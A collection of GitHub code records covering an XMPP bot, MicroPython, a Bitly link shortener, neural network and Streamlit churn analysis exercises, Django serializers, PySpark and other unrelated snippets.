room, fut = muc_client.join(\n muc_info[\"address\"],\n muc_info[\"nickname\"],\n autorejoin=True,\n )\n\n await fut\n muc_info[\"room\"] = room\n rooms[muc_info[\"address\"]] = muc_info\n\n processor = asyncio.ensure_future(process_queue(\n message_queue,\n rooms\n ))\n\n done, pending = await asyncio.wait(\n [\n processor,\n sigint_future,\n ],\n return_when=asyncio.FIRST_COMPLETED,\n )\n\n if sigint_future in done:\n if not processor.done():\n processor.cancel()\n try:\n await processor\n except asyncio.CancelledError:\n pass\n return\n\n if processor in done:\n processor.result()\n raise RuntimeError(\"processor exited early!\")\n finally:\n if not sigint_future.done():\n sigint_future.cancel()\n unix_transport.close()\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-c\", \"--config\",\n type=pathlib.Path,\n default=pathlib.Path.cwd() / \"config.toml\",\n help=\"Path to config file (default: ./config.toml)\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\",\n default=0,\n dest=\"verbosity\",\n action=\"count\",\n help=\"Increase verbosity (up to -vvv)\"\n )\n\n args = parser.parse_args()\n\n logging.basicConfig(\n level={\n 0: logging.ERROR,\n 1: logging.WARNING,\n 2: logging.INFO,\n }.get(args.verbosity, logging.DEBUG)\n )\n\n with args.config.open(\"r\") as f:\n config = toml.load(f)\n\n address = aioxmpp.JID.fromstr(config[\"xmpp\"][\"account\"])\n password = config[\"xmpp\"][\"password\"]\n\n socket_path = pathlib.Path(config[\"unix\"][\"path\"])\n\n mucs = []\n for muc_cfg in config[\"xmpp\"][\"muc\"]:\n mucs.append(\n {\n \"address\": aioxmpp.JID.fromstr(muc_cfg[\"address\"]),\n \"nickname\": muc_cfg.get(\"nickname\", address.localpart),\n \"format\": muc_cfg.get(\"format\"),\n \"required_fields\": frozenset(muc_cfg.get(\"required_fields\", [])),\n \"head_format\": muc_cfg.get(\"head_format\"),\n }\n )\n\n if socket_path.exists():\n if not socket_path.is_socket():\n raise RuntimeError(\"{} exists and is not a socket!\".format(\n socket_path,\n ))\n\n # FIXME: do not unlink the socket if it’s still live; abort instead.\n socket_path.unlink()\n\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(amain(\n loop,\n (address, password),\n (socket_path, ),\n mucs,\n ))\n finally:\n loop.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"horazont/aioxmpp","sub_path":"examples/pushbot.py","file_name":"pushbot.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"3185111123","text":"# ESP8266 LED Button\n# micropython exercise\n#\n\nimport machine\nimport time\n\nLED_PIN = 5\nBUTTON_PIN = 14\n\nled = machine.Pin(LED_PIN, machine.Pin.OUT)\nbutton = machine.Pin(BUTTON_PIN, machine.Pin.IN, machine.Pin.PULL_UP)\n\nwhile True:\n\n # The value function returns the current level of the pin,\n # either 1 for a high logic level or 0 for a low logic level.\n # Notice how the button is at a high level (value returns 1) when\n # it's not pressed. 
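    # A minimal variation under the same wiring assumptions (active-low button
    # with the internal pull-up enabled): watch for the falling edge so the LED
    # toggles once per press instead of mirroring the level, e.g.:
    #
    #     prev = 1
    #     while True:
    #         cur = button.value()
    #         if prev == 1 and cur == 0:  # falling edge: button just pressed
    #             led.value(not led.value())
    #         prev = cur
    #         time.sleep(.02)  # crude debounce interval
    #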
This is because the pull-up resistor keeps the pin at\n # a high level when it's not connected to ground through the button.\n # When the button is pressed then the input pin connects to ground\n # and reads a low level (value returns 0).\n if not button.value():\n led.on()\n else:\n led.off()\n\n time.sleep(.1)\n","repo_name":"SERC-Lv3IT-Unit19-Labs/Lab-ESP8266-Button","sub_path":"micropython/LEDbutton.py","file_name":"LEDbutton.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32761445746","text":"import os\nimport requests\nimport argparse\n\nfrom urllib.parse import urlparse\nfrom dotenv import load_dotenv\n\n\n\ndef shorten_link(token, url) :\n\n bitly_url = 'https://api-ssl.bitly.com/v4/shorten'\n \n headers = {'Authorization': 'Bearer {}'.format(token)}\n\n payload = {'long_url': url}\n \n response = requests.post(bitly_url, headers=headers, json=payload)\n \n response.raise_for_status()\n \n return response.json()['id']\n\n\ndef count_clicks(token, url):\n\n divided_url = urlparse(url)\n\n bitly_url = f'https://api-ssl.bitly.com/v4/bitlinks/{divided_url.netloc}{divided_url.path}/clicks/summary'\n \n headers = {'Authorization': 'Bearer {}'.format(token)}\n \n response = requests.get(bitly_url, headers=headers)\n \n response.raise_for_status()\n \n return response.json()['total_clicks']\n\n\ndef is_bitlink(url, api_key): \n\n divided_url = urlparse(url)\n\n bitly_url = f'https://api-ssl.bitly.com/v4/bitlinks/{divided_url.netloc}{divided_url.path}'\n \n headers = {'Authorization': 'Bearer {}'.format(api_key)}\n \n response = requests.get(bitly_url, headers=headers)\n \n return response.ok\n\n \nif __name__ == '__main__':\n \n load_dotenv()\n \n parser = argparse.ArgumentParser(\n description='Программа сокращает ссылки и считает кол-во переходов по ней'\n )\n\n parser.add_argument('link', help='Ваша ссылка')\n\n args = parser.parse_args()\n\n api_key = os.environ['BITLY_API_KEY']\n \n response_ok = is_bitlink(args.link, api_key)\n\n try :\n\n if not response_ok :\n \n print('Битлинк: ', shorten_link(api_key, args.link))\n\n else: \n\n print('По вашей ссылке прошли: {} раз(а)'.format(count_clicks(api_key, args.link)))\n \n except requests.exceptions.HTTPError as err:\n \n print(\"Во время выполнения произошла ошибка, статус ответа:\", err)\n\n \n\n \n\n\n","repo_name":"Evdokimov11/api_short_links_count","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13328189035","text":"def wrap_line(line, wlen, indent=2):\n \"\"\"Wrap a line at the last space before a specified length.\n \n NOTE: this goes WRONG for if words longer than wlen are present.\n \n Parameters:\n line (str): Line to wrap.\n wlen (int): Maximum line length to wrap at.\n indent (int): Indentation of the continuation line\n \n Returns:\n (str): The line with extra '\\n' characters.\n \"\"\"\n \n llen = len(line)\n \n # No need to break:\n if wlen >= llen: return line\n \n i0 = 0 # Base position\n il = wlen # Move between i0 and i0+wlen\n dl = -1 # Move backwards by default\n wraps = 0\n \n while True:\n # print(i0+il,llen)\n if line[i0+il]==' ':\n wraps += 1\n line = line[0:i0+il]+'\\n'+' '*indent+line[i0+il+1:] # Remove the space and add an indentation of spaces\n i0 = i0+il+indent\n il = wlen\n \n # print(wraps,wlen,llen,wraps*wlen,len(line),il,i0+il, line)\n if i0+il >= 
len(line): break\n            dl = -1 # Search backward by default\n            continue\n        \n        il += dl\n        if i0+il > llen: break\n        \n        # print('i0,il,i0+il,dl:\" ', i0,il,i0+il,dl)\n        if il==indent-1:\n            i0 += wlen\n            dl = +1 # Start searching forward\n            continue\n    \n    return line\n","repo_name":"MarcvdSluys/sluyspy","sub_path":"sluyspy/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} {"seq_id":"17775151782","text":"all_colors = [\n\t{\"label\": 'Red', \"sexy\": True},\n\t{\"label\": 'Pink', \"sexy\": False},\n\t{\"label\": 'Orange', \"sexy\": True},\n\t{\"label\": 'Brown', \"sexy\": False},\n\t{\"label\": 'Pink', \"sexy\": True},\n\t{\"label\": 'Violet', \"sexy\": True},\n\t{\"label\": 'Purple', \"sexy\": False},\n]\n\n# Your code goes here:\ndef generate_li(item):\n    return \"<li>\" + item[\"label\"] + \"</li>\"\n\ndef filter_colors(item):\n    if item[\"sexy\"]:\n        return item\n\nexpected = list(filter(filter_colors, all_colors))\nexpected_map = list(map(generate_li, expected))\n\nprint(expected_map)","repo_name":"sarasempere/ejerciciosPy_Loops","sub_path":"exercises/13.4-Making_HTML_with_filter_and_maP/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"556077195","text":"import numpy as np\nimport scipy.io as sc\nimport scipy.optimize as scop\nimport utils\nimport logistic_reg as lgr\n\ndef feed_forward(theta1, theta2, X):\n    a1 = np.c_[np.ones(len(X)), X] #Size(5000 * 401)\n    z2 = np.dot(theta1, a1.T) \n    a2 = lgr.sigmoid(z2)\n    a2 = np.c_[np.ones(len(a2[0])), a2.T] #Size(5000 * 26)\n    z3 = np.dot(theta2, a2.T)\n    a3 = lgr.sigmoid(z3) \n    a3 = a3.T #Size(5000 * 1)\n    return a3, a2, a1\n\ndef cost(theta1, theta2, X, y, lambda_):\n    \"\"\"\n    Compute cost for 2-layer neural network. \n\n    Parameters\n    ----------\n    theta1 : array_like\n        Weights for the first layer in the neural network.\n        It has shape (2nd hidden layer size x input size + 1)\n\n    theta2: array_like\n        Weights for the second layer in the neural network. \n        It has shape (output layer size x 2nd hidden layer size + 1)\n\n    X : array_like\n        The inputs having shape (number of examples x number of dimensions).\n\n    y : array_like\n        1-hot encoding of labels for the input, having shape \n        (number of examples x number of labels).\n\n    lambda_ : float\n        The regularization parameter. \n\n    Returns\n    -------\n    J : float\n        The computed value for the cost function. \n\n    \"\"\"\n    p, p2, p1 = feed_forward(theta1, theta2, X)\n    m = len(X)\n\n    cost = np.sum(y * np.log(p) + (1-y) * np.log(1 - p))\n    rCost = np.sum(theta1[:, 1:]**2) + np.sum(theta2[:, 1:]**2)\n\n    return -cost/m + ((lambda_/(2*m))*rCost)\n\n\n\ndef backprop(theta1, theta2, X, y, lambda_):\n    \"\"\"\n    Compute cost and gradient for 2-layer neural network. \n\n    Parameters\n    ----------\n    theta1 : array_like\n        Weights for the first layer in the neural network.\n        It has shape (2nd hidden layer size x input size + 1)\n\n    theta2: array_like\n        Weights for the second layer in the neural network. \n        It has shape (output layer size x 2nd hidden layer size + 1)\n\n    X : array_like\n        The inputs having shape (number of examples x number of dimensions).\n\n    y : array_like\n        1-hot encoding of labels for the input, having shape \n        (number of examples x number of labels).\n\n    lambda_ : float\n        The regularization parameter. \n\n    Returns\n    -------\n    J : float\n        The computed value for the cost function. 
\n\n grad1 : array_like\n Gradient of the cost function with respect to weights\n for the first layer in the neural network, theta1.\n It has shape (2nd hidden layer size x input size + 1)\n\n grad2 : array_like\n Gradient of the cost function with respect to weights\n for the second layer in the neural network, theta2.\n It has shape (output layer size x 2nd hidden layer size + 1)\n\n \"\"\"\n grad1 = np.zeros([len(theta1), len(theta1[0])])\n grad2 = np.zeros([len(theta2), len(theta2[0])])\n\n m = len(X)\n for i in range(m):\n a3, a2, a1 = feed_forward(theta1, theta2, [X[i]])\n\n sigma3 = a3 - y[i]\n gPrima = a2 * (1 - a2)\n sigma2 = np.dot(sigma3, theta2) * gPrima\n\n sigma = sigma2[:, 1:]\n\n grad1 += np.dot(sigma.T, a1)\n grad2 += np.dot(sigma3.T, a2)\n\n grad1[:,1:] += lambda_*theta1[:,1:]\n grad2[:,1:] += lambda_*theta2[:,1:]\n\n return (cost(theta1, theta2, X, y, lambda_), grad1/m, grad2/m)\n\ndef gradiant_descend(theta1, theta2, X, y, iter, alpha = 0, lambda_ = 0):\n for i in range (iter):\n c, th1, th2 = backprop(theta1, theta2, X, y, lambda_)\n theta1 -= alpha*th1\n theta2 -= alpha*th2\n print(i)\n\n return theta1, theta2\n\ndef backprop_aux(thetas, X, y, lambda_):\n th1 = np.reshape(thetas[:25 * (len(X[0]) + 1)], (25, len(X[0])+1))\n th2 = np.reshape(thetas[25 * (len(X[0]) + 1):], (len(y[0]), 26))\n c, g1, g2 = backprop(th1, th2, X, y, lambda_)\n return c, np.concatenate([np.ravel(g1), np.ravel(g2)])\n\ndef main():\n data = sc.loadmat('data/ex3data1.mat', squeeze_me=True)\n y = data['y']\n y_hot = np.zeros([len(y), 10])\n for i in range(len(y)):\n y_hot[i][y[i]] = 1\n X = data['X']\n\n # weights = sc.loadmat('data/ex3weights.mat')\n # theta1, theta2 = weights['Theta1'], weights['Theta2']\n # c = cost(theta1, theta2, X, y_hot, 1)\n # print(c)\n #utils.checkNNGradients(backprop, 1)\n\n theta1 = np.random.random((25, len(X[0]) + 1)) * (2*0.12) - 0.12\n theta2 = np.random.random((10, 26)) * (2*0.12) - 0.12\n\n theta1, theta2 = gradiant_descend(theta1, theta2, X, y_hot, 1000, 1, 1)\n\n cont =0\n for i in range(len(y)):\n if(yP[i] == y[i]):\n cont += 1\n print(\"Gradiant descent cost: \", cont / len(y) * 100, \"%\")\n\n theta1 = np.random.random((25, len(X[0]) + 1)) * (2*0.12) - 0.12\n theta2 = np.random.random((10, 26)) * (2*0.12) - 0.12\n\n arr = np.concatenate([theta1.ravel(), theta2.ravel()])\n result = scop.minimize(backprop_aux, arr, args=(X, y_hot, 1), method=\"TNC\", jac=True, options={'maxiter': 100})\n\n theta1 = np.reshape(result.x[:25 * (len(X[0]) + 1)], (25, len(X[0])+1))\n theta2 = np.reshape(result.x[25 * (len(X[0]) + 1):], (len(y_hot[0]), 26))\n\n yP = np.argmax(feed_forward(theta1, theta2, X)[0], 1) \n\n cont =0\n for i in range(len(y)):\n if(yP[i] == y[i]):\n cont += 1\n print(\"Scipy optimize cost: \", cont / len(y) * 100, \"%\")\n\nmain() ","repo_name":"oskar200130/AAlboroto","sub_path":"p5/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73028732533","text":"import numpy as np\nfrom matplotlib.mlab import bivariate_normal\n\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.models import LogColorMapper, LogTicker, ColorBar\n\noutput_file('color_bar.html')\n\nN = 100\nX, Y = np.mgrid[-3:3:complex(0, N), -2:2:complex(0, N)]\nZ1 = bivariate_normal(X, Y, 0.1, 0.2, 1.0, 1.0) + \\\n 0.1 * bivariate_normal(X, Y, 1.0, 1.0, 0.0, 0.0)\nimage = Z1 * 1e6\n\ncolor_mapper = LogColorMapper(palette=\"Viridis256\", low=1, 
high=1e7)\n\nplot = figure(x_range=(0,1), y_range=(0,1), toolbar_location=None)\nplot.image(image=[image], color_mapper=color_mapper,\n           dh=[1.0], dw=[1.0], x=[0], y=[0])\n\ncolor_bar = ColorBar(color_mapper=color_mapper, ticker=LogTicker(),\n                     label_standoff=12, border_line_color=None, location=(0,0))\n\nplot.add_layout(color_bar, 'right')\n\nshow(plot)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/bokeh_bokeh/bokeh-master/sphinx/source/docs/user_guide/examples/plotting_color_bars.py","file_name":"plotting_color_bars.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
+{"seq_id":"13200419595","text":"import pytest\nfrom conftest import FULL_DATA, AsyncMock, MagicMock\nfrom tesla_api.exceptions import ApiError\n\n\n@pytest.mark.asyncio\nasync def test_TeslaApiClient_get_vehicle(client, vehicle, mocker):\n    mocker.patch.object(client, \"get_vehicle\", new=AsyncMock(return_value=vehicle))\n    assert await client.get_vehicle(\"Lightning McQueen\") is vehicle\n\n\n@pytest.mark.asyncio\nasync def test_TeslaApiClient_list_vehicles(client, vehicle, mocker):\n    mocker.patch.object(client, \"list_vehicles\", new=AsyncMock(return_value=[vehicle]))\n    assert len(await client.list_vehicles())\n\n\n@pytest.mark.asyncio\nasync def test_TeslaApiClient_get(client, mocker, vehicle):\n    ctx = MagicMock()\n    resp = AsyncMock()\n\n    ctx.__aenter__.return_value = resp\n    ctx.__aexit__.return_value = resp\n    err = AsyncMock(return_value={\"error\": \"ICE > EV\"})\n    ok = AsyncMock(return_value={\"response\": FULL_DATA})\n    resp.json = err\n\n    mocker.patch.object(client, \"_get_headers\", return_value={\"hello\": \"you\"})\n    mocker.patch.object(client, \"authenticate\", new=AsyncMock(return_value=None))\n    mocker.patch.object(client._session, \"get\", return_value=ctx)\n\n    with pytest.raises(ApiError):\n        await client.get(\"vehicles\")\n\n    resp.json = ok\n\n    raw = await client.get(\"vehicles\")\n    assert raw == FULL_DATA == vehicle._data\n\n\n@pytest.mark.asyncio\n@pytest.mark.skip()\nasync def test_TeslaApiClient_list_energy_sites(client, mocker, vehicle):\n    data = await client.list_energy_sites()\n","repo_name":"Hellowlol/tesla_api","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"1488431285","text":"import streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom PIL import Image\n\nst.set_page_config(\n    page_title = 'Customer Churn - EDA',\n    initial_sidebar_state = 'expanded'\n)\n\ndef run() :\n    \n    # Create the title\n    st.title('Customer Churn Prediction')\n\n    # Create the subheader\n    st.subheader('EDA for Analysis of Customer Churn Dataset')\n\n    # Add an image\n    image = Image.open('churn.png')\n    st.image(image, caption='Customer Churn')\n\n    # Add a description\n    st.write('Page Made by **Satriya Fauzan Adhim**')\n\n    st.markdown('---')\n\n    st.write('## Background')\n    st.write('''Customer churn always has a negative impact on a company, the most \n             direct being lost profit. Customer churn is a common \n             challenge for many businesses across various industries, where customers \n             stop using the company's products or services and switch to competitors.''')
\n    st.write('## Problem Statement')\n    st.write('''The problem statement is to develop a predictive model using deep \n             learning Artificial Neural Networks (ANN) to identify customers who \n             are most likely to churn. The goal is to leverage available customer \n             data, such as demographics, purchase history, customer interactions, \n             and feedback, to build an accurate model that can predict churn behavior.''')\n    \n    # Draw a horizontal divider\n    st.markdown('---')\n\n    # Magic syntax: this bare string literal is rendered by Streamlit\n    '''\n    The objective is to develop a robust and accurate churn prediction model \n    that can be used to identify customers at risk of churn. This will enable \n    the company to take proactive measures, such as targeted marketing campaigns, \n    personalized offers, or improved customer service, to retain customers and \n    reduce churn.\n\n    By utilizing deep learning techniques, we aim to uncover intricate patterns \n    and relationships in the data that traditional models may struggle to capture. \n    The ANN model will be trained on historical customer data, where the churn \n    status is known, to learn the underlying patterns and create a predictive model.\n\n    '''\n\n    # Show the DataFrame\n    data_url = 'https://raw.githubusercontent.com/kodokgodog/Latihan_hactiv8/main/churn.csv'\n    data = pd.read_csv(data_url)\n    st.dataframe(data)\n\n    # Create a bar plot of the target\n    st.write('#### Plot churn_risk_score')\n    fig = plt.figure(figsize=(15, 5))\n    sns.countplot(x='churn_risk_score', data=data)\n    st.pyplot(fig)\n\n    st.write(\n        '''\n        From the visualization above, we can see that the number of customers predicted to churn \n        is higher than the number who stay. Those numbers will have a significant negative impact \n        on the company's business, with the churn rate exceeding half of the total \n        customers. Based on the percentages, we can also observe that the class distribution \n        appears to be roughly balanced.\n        ''')\n
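\n    # Added note (not in the original app): the balance claim above can be\n    # checked numerically with the same `data` frame; the two shares should be close.\n    st.write(data['churn_risk_score'].value_counts(normalize=True))\n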
\n    st.markdown('---')\n\n    # Set the figure size (5 x 2 grid for the ten categorical variables)\n    fig, axes = plt.subplots(figsize=(20, 25))\n\n    # Subplot 1\n    axes = plt.subplot(5, 2, 1)\n    plt.title('Variable gender')\n    sns.countplot(x='gender', data=data)\n\n    # Subplot 2\n    axes = plt.subplot(5, 2, 2)\n    plt.title('Variable region_category')\n    sns.countplot(x='region_category', data=data)\n\n    # Subplot 3\n    axes = plt.subplot(5, 2, 3)\n    plt.title('Variable membership_category')\n    sns.countplot(x='membership_category', data=data)\n\n    # Subplot 4\n    axes = plt.subplot(5, 2, 4)\n    plt.title('Variable joined_through_referral')\n    sns.countplot(x='joined_through_referral', data=data)\n\n    # Subplot 5\n    axes = plt.subplot(5, 2, 5)\n    plt.title('Variable preferred_offer_types')\n    sns.countplot(x='preferred_offer_types', data=data)\n\n    # Subplot 6\n    axes = plt.subplot(5, 2, 6)\n    plt.title('Variable internet_option')\n    sns.countplot(x='internet_option', data=data)\n\n    # Subplot 7\n    axes = plt.subplot(5, 2, 7)\n    plt.title('Variable used_special_discount')\n    sns.countplot(x='used_special_discount', data=data)\n\n    # Subplot 8\n    axes = plt.subplot(5, 2, 8)\n    plt.title('Variable offer_application_preference')\n    sns.countplot(x='offer_application_preference', data=data)\n\n    # Subplot 9\n    axes = plt.subplot(5, 2, 9)\n    plt.title('Variable past_complaint')\n    sns.countplot(x='past_complaint', data=data)\n\n    # Subplot 10\n    axes = plt.subplot(5, 2, 10)\n    plt.title('Variable complaint_status')\n    sns.countplot(x='complaint_status', data=data)\n\n    # Display the figure in Streamlit\n    st.pyplot(fig)\n\n    st.markdown('---')\n\n    df=data\n\n    # Set the figure size (3 x 2 grid for the six numeric variables)\n    fig, axes = plt.subplots(figsize=(20, 25))\n\n    # Subplot 1\n    axes = plt.subplot(3, 2, 1)\n    plt.title('Variable age')\n    sns.countplot(x='age', data=df)\n\n    # Subplot 2\n    axes = plt.subplot(3, 2, 2)\n    plt.title('Variable days_since_last_login')\n    sns.countplot(x='days_since_last_login', data=df)\n\n    # Subplot 3\n    axes = plt.subplot(3, 2, 3)\n    plt.title('Variable avg_time_spent')\n    sns.countplot(x='avg_time_spent', data=df)\n\n    # Subplot 4\n    axes = plt.subplot(3, 2, 4)\n    plt.title('Variable avg_transaction_value')\n    sns.countplot(x='avg_transaction_value', data=df)\n\n    # Subplot 5\n    axes = plt.subplot(3, 2, 5)\n    plt.title('Variable avg_frequency_login_days')\n    sns.countplot(x='avg_frequency_login_days', data=df)\n    \n    # Subplot 6\n    axes = plt.subplot(3, 2, 6)\n    plt.title('Variable points_in_wallet')\n    sns.countplot(x='points_in_wallet', data=df)\n\n    # Display the figure in Streamlit\n    st.pyplot(fig)\n\n    st.write(\n        '''\n        Based on the visualization above, we can see that the majority of churned customers are \n        either non-members or have low membership levels. Based on this data, a business strategy \n        can be developed. For example, offering attractive promotions or offers specifically \n        targeted at customers with low membership levels could be implemented. Additionally, \n        providing promotions like offers for new members can also be effective.\n\n        By targeting these specific segments, the business can aim to retain existing customers \n        with low membership levels and attract new customers through enticing offers. It is \n        important to create personalized and compelling incentives to encourage customer loyalty \n        and minimize churn.\n\n        It can also be observed that the average transaction value for customers who are likely to \n        churn is quite high. 
Therefore, if this issue is not addressed, the company will face a \n significant negative impact, particularly in terms of high profit loss.\n\n To mitigate this situation, the company could consider implementing retention \n strategies specifically targeting high-value customers. These strategies could include \n personalized offers, loyalty programs, or enhanced customer service tailored to their \n needs. By providing incentives and a positive customer experience, the company can \n encourage these customers to remain loyal and continue making high-value transactions.\n ''')\n\n st.markdown('---')\n\nif __name__== '__main__':\n run()","repo_name":"kodokgodog/Project","sub_path":"Customer Churn Prediction/deployment/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":7252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28472757225","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport shutil\nimport subprocess\nfrom time import *\n\ndef render(machine, parts = None):\n stl_dir = machine + os.sep + \"stls\"\n render_dir = machine + os.sep + \"render\"\n\n if os.path.isdir(render_dir):\n if not parts:\n shutil.rmtree(render_dir) #if doing them all clear the directory first\n sleep(0.1)\n os.makedirs(render_dir)\n else:\n os.makedirs(render_dir)\n\n #\n # List of individual part files\n #\n if parts:\n stls = [i[:-4] for i in parts]\n else:\n stls = [i[:-4] for i in os.listdir(stl_dir) if i[-4:] == \".stl\"]\n #\n # Add the multipart files\n #\n for i in os.listdir(stl_dir + os.sep + \"printed\"):\n if i[-4:] == \".stl\" and not i[:-4] in stls:\n stls.append(\"printed\" + os.sep + i[:-4])\n\n for i in stls:\n command = 'blender -b utils' + os.sep + 'render.blend -P utils' + os.sep + 'viz.py -- ' + \\\n stl_dir + os.sep + i + '.stl ' + render_dir + os.sep + i + '.png'\n print(command)\n subprocess.check_output(command.split())\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n render(sys.argv[1], sys.argv[2:])\n else:\n print(\"usage: render dibond|mendel|sturdy|huxley|your_machine, [part.stl ...]\")\n sys.exit(1)\n","repo_name":"nophead/Mendel90","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"21"} +{"seq_id":"38899824003","text":"from django.db import IntegrityError\nfrom rest_framework.exceptions import APIException, ValidationError\nfrom rest_framework.relations import StringRelatedField\nfrom rest_framework.serializers import ModelSerializer, CharField, IntegerField\n\nfrom assortment.models import Assortment\nfrom assortment.serializers import AssortmentSerializer\nfrom utils.response import get_error_message, C_API_EXCEPTION, C_PRICE_WRONG, C_QUANTITY_WRONG, C_USER_NOT_IN_COMPANY\nfrom .models import Product, ProductFeature, Feature, Category\n\n\nclass CategorySerializer(ModelSerializer):\n class Meta:\n model = Category\n fields = [\n 'id', 'name',\n ]\n\n\nclass FeatureSerializer(ModelSerializer):\n class Meta:\n model = Feature\n fields = [\n 'id', 'name',\n ]\n\n\nclass ProductFeatureSerializer(ModelSerializer):\n feature = CharField(source='feature.name')\n id = IntegerField(source='feature.id', required=False)\n\n class Meta:\n model = ProductFeature\n fields = [\n 'id', 'feature', 'value'\n ]\n\n\nclass ProductListSerializer(ModelSerializer):\n category = StringRelatedField()\n\n class Meta:\n model = Product\n 
fields = [\n 'id', 'name', 'category'\n ]\n\n\nclass ProductEntrySerializer(ModelSerializer):\n id = IntegerField(required=False)\n features = ProductFeatureSerializer(many=True, source='product_features')\n assortment = AssortmentSerializer(many=True, source='product_assortment', read_only=False)\n name = CharField(validators=[])\n\n class Meta:\n model = Product\n fields = [\n 'id', 'name', 'features', 'category', 'assortment',\n ]\n\n def validate_price(self, value):\n if self.context.get('action') == 'create' and int(value) == 0:\n raise ValidationError(get_error_message(C_PRICE_WRONG))\n return value\n\n def validate_quantity(self, value):\n if self.context.get('action') == 'create' and int(value) == 0:\n raise ValidationError(get_error_message(C_QUANTITY_WRONG))\n return value\n\n def validate(self, attrs):\n if not self.context.get('request').user.company:\n raise ValidationError(get_error_message(C_USER_NOT_IN_COMPANY))\n return attrs\n\n def create(self, validated_data):\n user = self.context.get('request').user\n\n features = validated_data.pop('product_features')\n assortment = validated_data.pop('product_assortment')\n assortment = assortment[0]\n\n try:\n product, _ = Product.objects.get_or_create(\n name=validated_data.get('name'),\n category=validated_data.get('category')\n )\n except IntegrityError:\n raise APIException(get_error_message(C_API_EXCEPTION))\n\n for item in features:\n try:\n feature, _ = Feature.objects.get_or_create(name=item.get('feature').get('name'))\n ProductFeature.objects.get_or_create(\n product=product,\n feature=feature,\n value=item.get('value')\n )\n except IntegrityError:\n raise APIException(get_error_message(C_API_EXCEPTION))\n\n Assortment.objects.get_or_create(\n company=user.company,\n product=product,\n price=assortment['price'],\n quantity=assortment['quantity'],\n available=assortment['available'],\n description=assortment['description'],\n )\n\n return product\n\n def update(self, instance, validated_data):\n user = self.context.get('request').user\n instance.name = validated_data.get('name')\n instance.category = validated_data.get('category')\n instance.save()\n features = validated_data.get('product_features')\n assortments = validated_data.get('product_assortment')\n assortments = assortments[0]\n for item in features:\n feature, _ = Feature.objects.get_or_create(name=item.get('feature').get('name'))\n try:\n product_feature = ProductFeature.objects.get(\n product=instance,\n feature=feature,\n )\n product_feature.value = item.get('value')\n product_feature.save()\n except ProductFeature.DoesNotExist:\n product_feature = ProductFeature.objects.create(\n product=instance,\n feature=feature,\n value=item.get('value'),\n )\n product_feature.save()\n try:\n assortment = Assortment.objects.get(\n company=user.company,\n product=instance\n )\n assortment.quantity = assortments.get('quantity')\n assortment.available = assortments.get('available')\n assortment.description = assortments.get('description')\n assortment.save()\n except Assortment.DoesNotExist:\n assortment = Assortment.objects.create(\n company=user.company,\n product=instance,\n quantity=assortments.get('quantity'),\n available=assortments.get('available'),\n description=assortments.get('description'),\n )\n assortment.save()\n\n return 
instance\n","repo_name":"Zippelin/DemoShop","sub_path":"docker/web/app/shop/product/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12253679475","text":"from ast import parse\nfrom pyspark import SparkContext, SparkConf\n\n\ndef parseLine(line):\n fields = line.split(',')\n userID = int(fields[0])\n cost = float(fields[2])\n return (userID, cost)\n\n\nif __name__ == \"__main__\":\n conf = SparkConf().setAppName(\"helloWorld\").setMaster(\"local\")\n sc = SparkContext(conf=conf)\n\n lines = sc.textFile(\"data/customer-orders.csv\")\n\n userCosts = lines.map(parseLine)\n\n totalSpentByCustomer = userCosts.reduceByKey(lambda x, y: x + y)\n\n flipped = totalSpentByCustomer.map(lambda x: (x[1], x[0]))\n sortedTotal = flipped.sortByKey()\n\n results = sortedTotal.collect()\n\n for total, userID in results:\n print(f'{userID} : {total:0.2f}$')","repo_name":"gf234/spark_practice","sub_path":"RDD/totalSpentByCustomer.py","file_name":"totalSpentByCustomer.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29155675602","text":"# Ingroup-Biased Copying Promotes Cultural Diversity and Complexity (https://tinyurl.com/ingroupdiversity)\r\n# Author: Marcel Montrey (marcel.montrey@mail.mcgill.ca)\r\n\r\nfrom multiprocessing import Pool, cpu_count # For running parallel simulations\r\nimport os # For creating directories\r\nimport random as rand # For randomization\r\nimport sys # For getting command line arguments\r\nimport networkx as nx # For generating graphs\r\nimport copy # For making deep copies of the parameters dictionary\r\nimport math # For the floor function\r\n\r\nimport agent # 